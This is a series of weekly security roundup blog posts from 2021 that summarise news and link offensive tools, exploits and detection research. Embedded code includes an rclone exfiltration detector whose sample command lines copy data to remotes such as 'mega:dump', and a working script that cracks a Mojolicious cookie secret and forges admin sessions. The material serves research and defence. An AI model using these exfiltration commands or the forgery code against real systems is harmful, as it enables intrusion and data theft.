Last Week in Security (LWiS) - 2021-05-03

By: Erik
4 May 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-04-26 to 2021-05-03.

News

  • A call for feedback on our policies around exploits and malware. The Microsoft owned GitHub has taken down a few exploits in the past (all against Microsoft products I believe). While there are lots of hot takes on infosec twitter about how this is the end of hosting exploits on GitHub, from my reading GitHub is being about as reasonable as a Microsoft owned company can be at this stage. If we see projects being removed at a higher rate after this, perhaps those hot takes will be warranted. I find it somewhat ironic that git was built as a way to share code peer-to-peer (decentralized) and we as a community have turned to one centralized git host for nearly all our code.
  • The IRS Wants Help Hacking Cryptocurrency Hardware Wallets. I find it interesting the IRS is looking for a "repeatable, consistent" process to break hardware devices designed to store secrets and launches Operation Hidden Treasure, while there are maybe other issues to focus on.
  • Why Google Should Stop Logging Contact-Tracing Data. After all the cryptographic work to ensure contact-tracing apps would preserve privacy, Google goes and dumps all the temporary identifiers into logs readable by phone manufacturers and other "privileged" apps. Who would have thought that a massive surveillance system on every smartphone would be potentially abused (surprised-pikachu.jpg).

Techniques

Tools and Exploits

  • DripLoader is an evasive shellcode loader for bypassing event-based injection detection, without necessarily suppressing event collection, but it does use direct syscalls. By using "standard" looking allocations and APIs, along with delays, DripLoader makes it difficult for EDRs to detect malicious activity during loading. It may be worth borrowing some of these techniques for your own custom loader.
  • vaf is a "very advanced fuzzer" written in Nim. While not as featured as ffuf I enjoy seeing more Nim projects.
  • SharpNamedPipePTH is a C# version of the tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. There is a blog post for explanation (from LWiS 2020-04-19).
  • memory-module-loader is an implementation of a Windows loader that can load dynamic-link libraries (DLLs) directly from memory. The loader exposed by the Windows operating system can only load modules from disk via LoadLibrary or LoadLibraryEx. However, it is entirely possible to load libraries from memory instead. This is one such implementation. This loader supports loading resources as well.
  • MicroBackdoor is a C2 tool for Windows targets with an easily customizable codebase and small footprint. Micro Backdoor consists of a server, client, and dropper. It wasn't designed as a replacement for your favorite post-exploitation tools but rather as a really minimalistic thing with all of the basic features in less than 5000 lines of code.
  • DoUCMe leverages the NetUserAdd Win32 API to create a new computer account. This is done by setting the usri1_priv of the USER_INFO_1 type to 0x1000. The primary goal is to avoid the normal detection of new user created events (4720). This will hide the user in the Control Panel and the lusrmgr.msc Snap In. It will show up in the Group Listing, but not as a user.
  • interactsh is an open-source solution for out of band data extraction, A tool designed to detect bugs that cause external interaction (blind SQLi, blind CMDi, SSRF, etc). Interactsh is an alternative to Burp Collaborator with potential to tie into other tools (i.e. nuclei).

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • paragon is a red team engagement platform with the goal of unifying offensive tools behind a simple UI. This project looks really cool, and does a ton of the heavy lifting that everyone who has thought, "I'll write my own implant/c2" has run into. I'm surprised this hasn't gotten more press (or maybe I've just missed it?).
  • SniperPhish is a phishing platform that has a few more features than the favorite Gophish, like an advanced web page builder to customize credential harvesting. I have yet to find a phishing platform that allows for "inbox management" (i.e. replying to emails via the web interface).

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-05-10

By: Erik
11 May 2021 at 21:30

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-05-03 to 2021-05-10.

News

Techniques

Tools and Exploits

  • DoubleStar is a personalized/enhanced re-creation of the Darkhotel "Double Star" APT exploit chain with a focus on Windows 8.1 and mixed with some custom techniques. While this exploit chain makes use of two (now patched) 0day exploits, it also contains an elevation of privilege technique which is still as of 2021-05-10 not patched, and remains feasible for integration into future attack chains today.
  • Introducing Mystikal. As more small and even large businesses adopt macOS, red teams are starting to focus more on the previously obscure platform. Mystikal is an initial access payload generator for macOS that includes: pkg installer with JavaScript, Microsoft Office Macros, and Armed "PDFs" (apps). Code here.
  • keygrabber is a script for grabbing keys from a Linux host. Useful during red team exercises to quickly help assess what access to a Linux host can lead to.
  • FalconEye is a Windows endpoint detection software for real-time process injections. It is a kernel-mode driver that aims to catch process injections as they are happening (real-time). Since FalconEye runs in kernel mode, it provides a stronger and more reliable defense against process injection techniques that try to evade various user-mode hooks. Add this to your detection lab and see if you can bypass it!
  • DomainBorrowing is a Covenant implementation of the evolution of my talk on Domain Hiding (since crippled by Cloudflare). Using some smaller CDNs it's possible to "borrow" a wildcard certificates if you register a nonexistent subdomain with them. Like Domain Hiding, this technique likely has a short shelf life but is really great research!
  • lateralus is a terminal based phishing campaign tool with template support. Could be useful for quick campaigns where you don't need the full power of something like Gophish.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • poseidon is a fully featured macOS Mythic implant with some Linux functionality as well.
  • metacall/core allows calling functions, methods or procedures between multiple programming languages. The ability to glue together multiple languages into a single solution without much overhead is very cool.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-05-17

By: Erik
18 May 2021 at 23:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-05-10 to 2021-05-17.

News

Techniques

Tools and Exploits

  • CVE-2020-28018 is one of the 21Nails Exim mail server vulnerabilities that combines a memory leak, arbitrary read primitive, and a write-what-where primitive to achieve arbitrary code execution. For details see From theory to practice: analysis and PoC development for CVE-2020-28018 (Use-After-Free in Exim).
  • Solaris is an LKM rootkit loader/dropper that lists available security mechanisms.
  • SharpNukeEventLog nukes the event log using some epic dinvoke fu to suspend the threads of the event log process.
  • RedWarden is a Cobalt Strike C2 Reverse proxy that fends off Blue Teams, AVs, EDRs, scanners through packet inspection and malleable profile correlation.
  • Dent is a framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's Windows Defender Advanced Threat Protection (called Microsoft Defender for Endpoint this week) sensors. All the details are in Breaking the (WDAPT) Rules with COM.
  • Russian is a registry file that changes two keys that are checked by some malware to determine if you are using a Russian language keyboard. This should be an absolute last resort defense against ransomware, but is very easy to deploy.
  • exclave helps offload wrapping/unwrapping of offensive payloads with Intel SGX technology assist. This is an interesting project to protect C2 secrets using protected processor memory and Intel's secure enclave technology.
  • dnMerge is a lightweight .NET assembly dependency merger that uses dnLib and 7zip's LZMA SDK for compressing dependent assemblies.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • delta aims to make time studying diffs both efficient and enjoyable: it allows you to make extensive changes to the layout and styling of diffs, as well as allowing you to stay arbitrarily close to the default git/diff output.
  • jenkins-attack-framework is a project to help assess the popular CI/CD product Jenkins.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-05-24

By: Erik
25 May 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-05-17 to 2021-05-24.

News

Techniques

  • Operators, EDR Sensors, and OODA Loops. This is a long post (full con talk), but should be required reading for any serious red team operator. Lots of people (ahem, me) can get focused on the latest exploit or technique and lose sight of the process of red teaming. Hopefully this blog can serve as part of the "continual learning and growth" part of the act phase.
  • What the F#*%. The lesser known cousin of C# comes with Microsoft signed binaries that can be useful to get past application allowlisting defenses. Code available in the What-The-F repository.
  • That single GraphQL issue that you keep missing. Bug hunters will love this post on GraphQL based CSRF. The latest release of inql will help identify such issues on your next assessment or bug hunt.
  • CVE-2021-31166: A Wormable Code Execution Bug in HTTP.sys. While not as bad as it sounds, this is reachable from IIS and WinRM, so do patch! BSOD PoC: CVE-2021-31166.
  • CloudFlare for IP Address Filtering. CloudFlare is a massive presence on the internet today, hosting over 25 million domains. In this post Vincent uses the CloudFlare firewall to block known security organizations as well as "bots" to defend his red team infrastructure.
  • Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack. This tool/technique helps an attacker create an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to. After the application has been granted consent, it has user account-level access to the data without the need for an organizational account. This can be defeated by admins who enable tenant restrictions to manage access to SaaS cloud applications.
  • Unveiling DNSStager: A tool to hide your payload in DNS. With enough delay, the 59 AAAA DNS requests could easily be lost in the noise and provide the perfect way to load a lifeline beacon. The client could be modified to check a trigger (value in a GitHub gist, Twitter bio, etc) and start the process when the value changes. Be careful though: DNS is one of those things that defenders are either totally blind to, or can get you caught easily if someone is watching (high entropy/high volume of unusual requests).
  • Modding Gophish. Gophish has some default and unchangeable features that you may not want (X-Mailer header perhaps). This post shows how to change the 404 page as well as how to enable basic HTTP auth which may be more trusted by your targets.
  • Le Zeek, C’est Chic: Using an NSM for Offense. The blue team's favorite tool can also be used for offense to find dual-homed machines, dns queries, and even plaintext credentials on the wire.
  • SimuLand: Understand adversary tradecraft and improve detection strategies. SimuLand is an open-source initiative by Microsoft to help security researchers around the world deploy lab environments that reproduce well-known techniques used in real attack scenarios, actively test and verify the effectiveness of related Microsoft 365 Defender, Azure Defender, and Azure Sentinel detections, and extend threat research using telemetry and forensic artifacts generated after each simulation exercise.
  • How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks. This excellent post discusses two methods by which an attacker can meet the requirements of hosting an “Intranet” site, explains how an attacker can combine this scenario with Active Directory ACL attack path vulnerabilities and LDAP relaying attacks to elevate privileges, and provides a detailed walkthrough of how an operator can accomplish these tasks through Cobalt Strike.
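The DNSStager item above notes that a burst of high-entropy AAAA lookups is exactly what a watching defender keys on. The following is an added example of that detection, not code from DNSStager or its author: it parses a constructed, made-up query log (format, client addresses and domain names are all invented for illustration) and flags any client that sends many AAAA queries with high-entropy leftmost labels under a single domain.

```python
"""Flag clients issuing many high-entropy AAAA queries under one domain.

Constructed example: the log line format ("<time> <client> <qtype> <qname>"),
the client addresses and the domain names below are invented for this
illustration and do not come from DNSStager or any real resolver log.
"""
import math
import re
from collections import defaultdict

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(A|AAAA|TXT|MX|CNAME)\s+(\S+)$")


def shannon_entropy(label: str) -> float:
    """Bits of entropy per character of a single DNS label."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label.lower():
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname: str) -> str:
    """Last two labels of the query name. Good enough for this example; a
    real deployment would consult a public-suffix list instead."""
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-2:])


def find_suspicious_aaaa(lines, min_queries=20, min_entropy=3.0):
    """Return {(client, base_domain): (query_count, mean_label_entropy)} for
    every client/domain pair whose AAAA query count and mean leftmost-label
    entropy both reach the thresholds."""
    stats = defaultdict(list)  # (client, domain) -> entropies of each query's first label
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line, skip it
        _, client, qtype, qname = m.groups()
        if qtype != "AAAA":
            continue
        leftmost = qname.rstrip(".").split(".")[0]
        stats[(client, base_domain(qname))].append(shannon_entropy(leftmost))
    flagged = {}
    for key, ents in stats.items():
        mean_ent = sum(ents) / len(ents)
        if len(ents) >= min_queries and mean_ent >= min_entropy:
            flagged[key] = (len(ents), round(mean_ent, 2))
    return flagged


def sample_log():
    """Constructed sample: one host performing 59 chunk-style lookups with
    32-hex-character labels, plus ordinary IPv6 lookups from other hosts."""
    lines = []
    for i in range(59):
        # Deterministic stand-in for encoded chunk data: 16 bytes stepping by 25,
        # which spreads the hex digits evenly (entropy well above 3.8 bits/char).
        label = "".join(f"{(i * 239 + k * 25) % 256:02x}" for k in range(16))
        lines.append(f"2021-05-24T10:00:{i % 60:02d} 10.0.0.5 AAAA {label}.cdn-update.example.")
    lines += [
        "2021-05-24T10:01:00 10.0.0.7 AAAA www.example.com.",
        "2021-05-24T10:01:01 10.0.0.7 A www.example.com.",
        "2021-05-24T10:01:02 10.0.0.9 AAAA mail.example.org.",
    ]
    return lines


if __name__ == "__main__":
    for (client, domain), (count, ent) in find_suspicious_aaaa(sample_log()).items():
        print(f"{client} -> {domain}: {count} AAAA queries, mean label entropy {ent}")
```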

Tools and Exploits

  • HelpColor. I open the Beacon Command Behavior Survey page all the time; this will be super useful for quickly seeing if I am about to fork and run! It's easy to add your own BOFs and other tools as well.
  • RDPThiefInject is RdpThief run through donut and wrapped in C# to easily inject into mstsc. Convert to D/Invoke before using for better OPSEC.
  • OffensivePH. The older ProcessHacker driver has a lot of capabilities and may be a "known good" and thus not be detected.
  • golang-insecureskipverify-patch. If you need to inspect TLS protected communication of a black-box golang binary and it does not trust the system level CA certificates, then you can use this tool to patch the executable to act like InsecureSkipVerify was turned on. You still have some additional work, configuring a transparent proxy and setting up mitmproxy or similar.
  • macos_shell_memory is a CGo implementation of the initial technique put forward by Stephanie Archibald in her blog, Running Executables on macOS From Memory. It includes some convenience patches like preventing the executable's exit() call from killing the Go process.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • link is a command and control framework written in Rust (cross platform) that has execute-assembly and other advanced features.
  • metarget is a framework providing automatic constructions of vulnerable infrastructures.
  • BlueCloud is a project for cyber range deployment including Velociraptor + HELK system with a Windows VM for security testing and R&D with Azure and AWS terraform support.
  • in-memory-cpython is a mod of cpython that can be run entirely from memory for use in offensive or defensive tooling.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-05-31

By: Erik
2 June 2021 at 02:40

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-05-24 to 2021-05-31.

News

  • VMSA-2021-0010: What You Need to Know. "There is a remote code execution vulnerability in the vSAN plugin, which ships as part of vCenter Server. This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of whether you use vSAN or not." No PoC yet, but considering vCenter/ESXi usually host most critical IT assets, this should be an emergency patch. Get the NSE checker here, and more analysis here.
  • QUIC Version 1 is live on Cloudflare. QUIC is a new transport protocol built on top of UDP. Unfortunately, to access HTTP resources with HTTP/3, QUIC still includes an unencrypted Client Hello which includes the server name. Can you combine Encrypted Client Hello and QUIC (add ECH support to the test client and let me know)? QUIC also has some interesting things in the pipeline (masque).
  • Introducing Half-Double: New hammering technique for DRAM Rowhammer bug. Attackers can now use a second controlled row, which has a "non-linear gating effect", to "transport" the Rowhammer effect from the first row, through the second, to a victim row; this is an intrinsic property of the underlying silicon substrate. No practical implications yet, but now you know when the CISO asks if you need to remediate for the new Rowhammer variant. JEDEC has published two documents about DRAM and system-level mitigation techniques (JEP300-1 and JEP301-1).
  • Amazon devices will soon automatically share your Internet with neighbors. Many Amazon devices will start allowing other amazon devices owned by different customers to use their internet connection to connect back to Amazon. If you don't want to be part of the world's largest botnet, opt-out now or don't buy IoT devices that are thinly veiled tools of surveillance.
  • Book Release: "Adversarial Tradecraft in Cybersecurity". Dan's book drops June 9th, and looks to be a great collection of techniques and tricks for both red and blue teams. This will be a must read for any CCDC or ProsVJoes competitors!
  • M1ssing Register Access Controls Leak EL0 State. A register on the M1 chip can be read and written to by any process, enabling two pieces of malware on the same machine to communicate. Big deal? Probably not (there are much easier ways for malware to communicate on the same system), but it could allow malware in separate virtual machines to communicate.
  • The Full Story of the Stunning RSA Hack Can Finally Be Told. Before "supply chain attack" was a buzzword, the Chinese were harvesting RSA seeds straight from the source. Despite the dramatic language, the operation wasn't all that novel. Phish a user, expand access, harvest data.

Techniques

  • Zero-Day TCC bypass discovered in XCSSET malware. Dropping a malicious .app inside the folder of an app that was given screen recording permissions was enough to bypass Apple's protections and allow a malicious actor to take screenshots without the user approving the malware to do so. This was patched in macOS 11.4. PoC that captures 15 seconds of camera without asking if placed inside an app directory that has approved camera access (facetime, photobooth, etc): CaptureCam.
  • Abusing and Detecting LOLBIN Usage of .NET Development Mode Features. With the right privileges, it is possible to modify the configuration for .Net binaries in system32 and (along with setting an environment variable) leverage them for application control bypass with managed assembly modification (depending on the solution), general DLL hijack/sideloading, and persistence.
  • Step-by-step how to deanonymize emails on LinkedIn. With the Outlook integration (thanks to the Microsoft purchase of LinkedIn), anyone with an Outlook account and an intercepting proxy can leak the emails of users on LinkedIn (pro tip: check your privacy settings!).
  • Detecting Rclone – An Effective Tool for Exfiltration. Ransomware gangs often pull large amounts of target data before encrypting a network, and this post looks into ways to detect this exfiltration hopefully in time to stop the encryption.
  • TeamViewer Local Privilege Escalation Vulnerability. This is a writeup of a macOS privilege escalation in TeamViewer from 2020-11, but the technique may be applicable to other apps that run privileged helpers.
  • Baking Mojolicious cookies. Much like JWT, cookies from the Perl web framework Mojolicious are signed with an HMAC keyed by the application secret, so a predictable or weak secret lets an attacker brute force it offline against a captured cookie and then forge sessions at will.
  • The Attack Path Management Manifesto. The team at SpecterOps are masters of the Attack Path and this manifesto lays out their thinking.
  • Abusing LNK "Features" for Initial Access and Persistence. LNK files can be set to run on a key shortcut and can be hidden. Writing an LNK file to the desktop from a macro and having the shortcut run a payload that injects a C2 tool and removes the LNK (restoring the shortcut) could gain stealthy initial access and the target would only notice one broken copy function. This has the added benefit of spawning your C2 loader as a child of explorer.exe naturally.
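The Rclone post above is about spotting exfiltration from process telemetry. The following is an added example, not code from that post: a small detector run over constructed Sysmon-style process-creation records. The indicators (rclone subcommands, the `name:path` remote syntax, a few flags, and an `OriginalFileName` that does not match the image name) are my own heuristic choices, so treat them as assumptions to tune rather than a published rule.

```python
import re
import shlex

# Constructed Sysmon-style process-creation records for the demo; not real telemetry.
EVENTS = [
    {"Image": r"C:\Users\bob\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'rclone.exe copy "C:\Finance" mega:dump --config C:\Users\bob\r.conf --transfers 32 -q'},
    {"Image": r"C:\ProgramData\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'svchost.exe sync \\fs01\share remote:exfil --no-check-certificate'},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r'cmd.exe /c copy a.txt b.txt'},
]

# Indicators chosen for this example (assumptions; tune to your environment).
SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto"}
# "name:path" remote syntax; the lookahead rejects drive letters (C:\) and URLs (http://).
REMOTE = re.compile(r"^[A-Za-z0-9_-]+:(?![\\/])")
SUSPICIOUS_FLAGS = {"--config", "--no-check-certificate", "--auto-confirm",
                    "--transfers", "--progress", "--ignore-existing", "--multi-thread-streams"}


def detect(event: dict) -> list:
    """Return the reasons an event looks like rclone exfiltration ([] if clean)."""
    reasons = []
    ofn = event.get("OriginalFileName", "").lower()
    image = event.get("Image", "").lower()
    exe = image.rsplit("\\", 1)[-1]
    # PE version info survives renaming, so a mismatch means someone hid the binary.
    if ofn == "rclone.exe":
        reasons.append("OriginalFileName is rclone.exe")
        if exe != "rclone.exe":
            reasons.append(f"rclone renamed to {exe}")
    # posix=False keeps Windows backslashes intact; strip the quotes shlex leaves on tokens.
    tokens = [t.strip('"') for t in shlex.split(event.get("CommandLine", ""), posix=False)]
    args = tokens[1:]
    sub = next((t for t in args if t.lower() in SUBCOMMANDS), None)
    remote = next((t for t in args if REMOTE.match(t)), None)
    if sub and remote:
        reasons.append(f"rclone-style '{sub}' to remote '{remote}'")
    flags = sorted(set(args) & SUSPICIOUS_FLAGS)
    if flags and (sub or ofn == "rclone.exe"):
        reasons.append("flags: " + " ".join(flags))
    return reasons


def scan(events: list) -> list:
    """Return (index, reasons) for every event detect() flags."""
    return [(i, r) for i, e in enumerate(events) if (r := detect(e))]


if __name__ == "__main__":
    for i, reasons in scan(EVENTS):
        print(f"event {i}: " + "; ".join(reasons))
```

The second record is the interesting one: the binary was renamed to svchost.exe, but the PE's OriginalFileName and the `sync ... remote:exfil` command line still give it away. The plain `cmd.exe /c copy` record shares the word "copy" and is correctly ignored because nothing in it looks like a remote.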
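To make the Mojolicious cookie point concrete, here is an added example (my own code, not from the linked post or the framework): a signed cookie in the general `payload--hexmac` shape, an offline crack of a weak secret from a constructed wordlist, and a forged session once the secret is known. The exact layout, the base64 JSON payload, the SHA-1 digest, and the wordlist are assumptions for this demo; the digest is a parameter because the real framework's choice depends on version.

```python
import base64
import hashlib
import hmac
import json

# Layout assumed for this example: "<base64 JSON>--<hex HMAC>". The digest is a
# parameter because the framework's choice depends on its version (assumption).
DIGEST = hashlib.sha1

# Constructed wordlist of weak application secrets (not data from the post).
WORDLIST = ["secret", "password", "changeme", "myapp", "s3cret"]


def encode_session(session: dict) -> str:
    return base64.b64encode(json.dumps(session, separators=(",", ":")).encode()).decode()


def decode_session(payload: str) -> dict:
    return json.loads(base64.b64decode(payload))


def sign(payload: str, secret: str, digest=DIGEST) -> str:
    mac = hmac.new(secret.encode(), payload.encode(), digest).hexdigest()
    return f"{payload}--{mac}"


def split_cookie(cookie: str):
    payload, sep, mac = cookie.rpartition("--")
    if not sep:
        raise ValueError("not a signed cookie")
    return payload, mac


def verify(cookie: str, secret: str, digest=DIGEST) -> bool:
    payload, mac = split_cookie(cookie)
    expected = hmac.new(secret.encode(), payload.encode(), digest).hexdigest()
    return hmac.compare_digest(expected, mac)


def crack_secret(cookie: str, candidates, digest=DIGEST):
    """Offline guess: the captured cookie is both the challenge and the oracle."""
    for secret in candidates:
        if verify(cookie, secret, digest):
            return secret
    return None


def forge(cookie: str, secret: str, digest=DIGEST, **changes) -> str:
    """Re-sign the session with attacker-chosen fields once the secret is known."""
    payload, _ = split_cookie(cookie)
    session = decode_session(payload)
    session.update(changes)
    return sign(encode_session(session), secret, digest)


def sample_cookie() -> str:
    # Constructed victim cookie from an app whose secret is its moniker, "myapp".
    return sign(encode_session({"user": "alice", "admin": False}), "myapp")


if __name__ == "__main__":
    cookie = sample_cookie()
    secret = crack_secret(cookie, WORDLIST)
    print("recovered secret:", secret)
    print("forged:", forge(cookie, secret, admin=True))
```

The attack needs no interaction with the server until the final forged request, which is why a weak secret is fatal: the HMAC protects integrity only as long as the key cannot be guessed.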

Tools and Exploits

  • My RCE PoC walkthrough for (CVE-2021–21974) VMware ESXi OpenSLP heap-overflow vulnerability. This is a detailed walk through of the development process of a heap-overflow for ESXi and the first public PoC for it (that I am aware of).
  • 2.2.0 20210525 MSTSC Passwords is a new Mimikatz release that can dump plaintext RDP credentials without injection or hooking. This technique was discussed in LWiS 2021-05-17.
  • scanflow boasts a feature set similar to the likes of CheatEngine, with a simple command line interface. Utilizing memflow, scanflow works in a wide range of situations - from virtual machines, to dedicated DMA hardware.
  • Microsoft-JSON-Web-Token-Extractor is a C# project to extract JSON Web Tokens from memory without dumping anything on disk to avoid detection by Endpoint Detection and Response. Check out the blog post for more information.
  • Carbuncle is a tool for interacting with outlook interop during red team engagements. Not a new release, but 0.2 adds a lot of nice features. Be warned, depending on the setup this could cause a popup to be created for the user!
  • InvisibilityCloak is a proof-of-concept obfuscation toolkit for C# post-exploitation tools. For more information check out the blog post.
  • SharpUnhooker is a C# universal API unhooker - automatically unhook functions from ntdll.dll, kernel32.dll, user32.dll, and kernelbase.dll.
  • wowInjector is a PoC to exploit the 32-bit thread snapshot of WOW64 to take over $RIP, inject & bypass AV.
  • boobsnail allows generating Excel 4.0 XLM macros. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.
  • loginItemManipulator is an Objective-C tool to list, add, and remove login items for a user's session and the global login item lists on macOS.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-06-08

By: Erik
9 June 2021 at 03:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-05-31 to 2021-06-08 (bonus day!).

News

  • VAN BUREN v. UNITED STATES. The CFAA cannot be used to prosecute rogue employees who have legitimate access to work-related resources (in this case a police officer running unsanctioned database searches for money); they will need to be prosecuted under different charges. This adds weight to the 9th circuit court ruling that ToS violations are not a crime.
  • Justice Dept. Claws Back $2.3M Paid by Colonial Pipeline to Ransomware Gang. The DOJ stated that the ransom payment "had been transferred to a specific address, for which the FBI has the 'private key,' or the rough equivalent of a password needed to access assets accessible from the specific Bitcoin address" which caused some to believe the FBI had either "cracked" Bitcoin (no) or seized a custodial wallet. I doubt the DarkSide crew is foolish enough to use a US based custodial exchange, and therefore the logical answer is _someone_ shelled DarkSide and transferred the Bitcoin to an address the FBI happened to control.
  • Updates to our policies regarding exploits, malware, and vulnerability research. GitHub resolves their policy update on exploits in a reasonable manner. "Dual-use" security research is allowed, but you can't use GitHub itself as part of an attack (i.e. use gists for C2) and as always it reserves the right to remove PoCs used in attacks.

Techniques

Tools and Exploits

  • netkat is a netcat version using raw sockets to avoid iptables and/or other OS filtering mechanisms. This could come in handy if you land inside a container running with sufficient privileges to do network shenanigans.
  • KnockOutlook is a C# project that interacts with Outlook's COM object in order to perform a number of operations useful in red team engagements. Be sure to check out Carbuncle and OutlookToolbox_v2 for more complete feature sets.
  • PhishInSuits is a tool to automate OAuth device code phishing using verified apps with Twilio-powered phishing SMS messages.
  • Conf-thief will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to. It allows you to use a dictionary/keyword search file to search all files in the target Confluence for potentially sensitive data. Check out the blog post: Stealing All of the Confluence Things.
  • penelope is an advanced shell handler. Its main aim is to replace netcat as the shell catcher when exploiting RCE vulnerabilities. It works on Linux and macOS and the only requirement is Python 3.
  • transacted_hollowing is a PE injection technique, hybrid between Process Hollowing and Process Doppelgänging - as seen in the Osiris dropper. Check out the blog post for all the details.
  • microsoftteams_getonly.profile is a C2 profile for Cobalt Strike that mimics the network traffic of Microsoft Teams. Be warned, Azure is now shutting down accounts that use domain fronting.
  • payloadSecretary can be used to automatically type long base64 encoded payloads into restricted environments (VDI, Citrix, etc).
  • CredManBOF is a BOF file to use with Cobalt Strike, dumping the credential manager by abusing SeTrustedCredManAccessPrivilege. Original research was done by James Forshaw and further information is located here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • BeaconHunter is a behavior based monitoring and hunting tool built in C# that leverages ETW tracing. Blue teamers can use this tool to detect and respond to potential Cobalt Strike beacons. Red teamers can use this tool to research ETW bypasses and discover new processes that behave like beacons.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-06-14

By: Erik
15 June 2021 at 02:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-06-08 to 2021-06-14.

News

Techniques

Tools and Exploits

  • CVE-2021-33739-POC is an exploit for the Microsoft DWM Core Library Elevation of Privilege Vulnerability (Windows 10 1909 to 20H2 and Server Core 2004/20H2). You'll probably want to swap the included shellcode and test in a disposable VM!
  • MonitorUI is a GUI for Objective-See's ProcessMonitor tool for macOS.
  • Celeborn is a Userland API Unhooker developed for learning Windows APIs and Syscall implementations. It mainly detects and patches hooking instructions in NTDLL.dll file. Written in C, targeting Windows.
  • Melkor is able to read .Net assemblies and encrypt them in memory using DPAPI with the CRYPTPROTECT_LOCAL_MACHINE flag. These assemblies are kept encrypted when they are at rest. On demand Melkor can decrypt the assemblies and execute methods from them in a separate AppDomain. Once execution finishes the AppDomain is unloaded and only the encrypted assembly remains in memory.
  • SharpHook is inspired by the SharpRDPThief project. It uses various API hooks in order to output the desired credentials.
  • WindowsPermsPoC is a simple PoC to demonstrate that it is possible to write to non-writable memory and execute non-executable memory on Windows. This is possible because of the way WriteProcessMemory works and the fact that developers can disable DEP for their own programs. The end result is you can write to and execute from READ_ONLY tagged memory. Only on Windows...
  • SharpTeamsDump is a .Net implementation of the research published here. Note that it extracts messages from a log file on disk, not by interacting with Teams itself.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • adalanche is a bloodhound-like active directory explorer written in Go. While it cannot ingest standard sharphound data, it does have its own collection mechanism.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-06-21

By: Erik
22 June 2021 at 01:10

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-06-14 to 2021-06-21.

News

  • Snowflake moving to stable in Tor Browser 10.5. This is an interesting solution for users in restrictive environments that uses volunteer browsers as WebRTC proxies for the initial bridge connection into the Tor network. The initial broker connection uses domain fronting on Azure, so this may not last very long (or will be forced to switch providers).
  • Testing In-Headset VR Ads. Facebook buys Oculus. Facebook puts ads in Oculus VR. No one is surprised.
  • Rocky Linux 8.4 Available Now. After Red Hat (and with it CentOS) was sold to IBM, Big Blue predictably cut support for the community supported CentOS and turned it into a rolling release (breaking lots of LTS promises in the process). The community responded and in just 7 months a stable replacement distro is available! The migrate2rocky script makes moving from CentOS 8 to Rocky easy.

Techniques

Tools and Exploits

  • bofnet_executeassembly. If you aren't using BOF.NET you are missing out. With this pull request, there is no excuse as you can drop in standard .NET assemblies and use them without any modification as a BOF. No more fork and run - opsec++. More details in this blog post.
  • Polkit-exploit is a proof of concept for an authentication bypass in polkit, which allows an unprivileged user to call privileged methods using DBus (blog post in LWiS 2021-06-14).
  • image-upload-exploits is a nice collection of ways to potentially leverage image uploads on web applications for data leaks or even shells!
  • BloodCheck enables Red and Blue Teams to manage multiple Neo4j databases and run Cypher queries against a BloodHound dataset.
  • Syscalls-Extractor is a script for automatically extracting syscall numbers for an OS.
  • admin-login is a wordlist of potential admin panels for web app testing.
  • brick is a small tool designed to identify potentially vulnerable SMM modules in a UEFI firmware image. It is composed of a collection of modules (implemented as IDAPython scripts), each responsible for identifying a specific vulnerability/anti-pattern in SMM code.

